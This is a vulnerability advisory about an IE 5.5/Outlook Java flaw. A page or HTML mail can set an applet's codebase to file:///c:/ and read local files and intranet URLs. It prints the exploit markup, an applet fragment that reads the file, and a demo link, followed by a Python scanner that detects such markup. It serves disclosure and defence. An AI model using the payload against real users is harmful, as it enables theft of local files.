IE/Outlook Java security vulnerability exposes local files
------------------------------------------------------------------------

SUMMARY

There is a security vulnerability in IE 5.5/Outlook/Outlook Express which allows reading of local files, arbitrary Intranet URLs and the local directory structure after viewing a web page or reading a malicious HTML message.

DETAILS

The problem lies in the ability to specify an arbitrary codebase for an applet loaded from an <OBJECT> tag and a jar file. Applets may read URLs from their codebase and communicate with hosts from the same codebase.

The following code:

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>

sets the applet's codebase to file:///c:/.

This is not a Java language problem and supposedly not a problem in Microsoft's VM, but rather a problem in the way the codebase is set by IE.

Exploit:

The code is:

---------javacodebase1.html------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
---------------------------------------------------------------------

--------gjavacodebase.java-------------------------------------------
.....
try
{
    // URL comes from the <PARAM NAME="URL"> value in the page
    u = new URL(getParameter("URL"));
    InputStream is=u.openStream();
    byte ba[]=new byte[1000];
    int l=is.read(ba);
    InputStream os=u.openConnection().getInputStream();
    String s1=new String(ba,0,l);
    // show the URL and the bytes read from it
    print(u.toString());
    print(s1);
}
......
---------------------------------------------------------------------

Workaround:

Disable Java.

Demonstration:

A live demonstration is available at:
http://www.guninski.com/javacodebase1.html

-- 
Eko Sulistiono
MIKRODATA & AntiVirus Media
Web: http://www.mikrodata.co.id/
WAP: http://www.mikrodata.co.id/wap/index.wml
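
For filtering HTML mail or proxied pages, the pattern described in the advisory can be detected statically. The following is an added example, not part of the original message or advisory: it flags Java <OBJECT>/<APPLET> elements whose CODEBASE is a file: URL or names a different origin than the ARCHIVE jar. The scan() and origin() names, the origin-mismatch heuristic and the benign sample are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
# The <OBJECT> markup quoted in the advisory above.
PAGE_SAMPLE = '''<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>'''
# Constructed benign sample: codebase and jar share one origin.
BENIGN = '''<object classid="java:Demo.class">
<param name="archive" value="http://applets.example.test/classes/demo.jar">
<param name="codebase" value="http://applets.example.test/classes/">
</object>'''

def origin(url):
    """(scheme, host) of a URL, lower-cased; host is '' for file: URLs."""
    parts = urlsplit(url.strip())
    return (parts.scheme.lower(), (parts.hostname or "").lower())

class CodebaseScanner(HTMLParser):
    """Flags Java <OBJECT>/<APPLET> elements with a suspicious CODEBASE."""
    def __init__(self):
        super().__init__()
        self.current = None   # settings of the Java element being parsed
        self.findings = []    # (reason, codebase, archive) tuples

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # parser lower-cases names
        if tag in ("object", "applet"):
            java = tag == "applet" or a.get("classid", "").lower().startswith("java:")
            self.current = a if java else None
        elif tag == "param" and self.current is not None:
            self.current[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag in ("object", "applet") and self.current is not None:
            cb, ar = self.current.get("codebase", ""), self.current.get("archive", "")
            cbo, aro = origin(cb), origin(ar)
            if cbo[0] == "file":
                self.findings.append(("local file: codebase", cb, ar))
            elif cbo[0] and aro[0] and cbo != aro:
                self.findings.append(("codebase/archive origin mismatch", cb, ar))
            self.current = None

def scan(html):
    scanner = CodebaseScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

Relative CODEBASE or ARCHIVE values are not compared, since resolving them needs the URL of the containing document.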
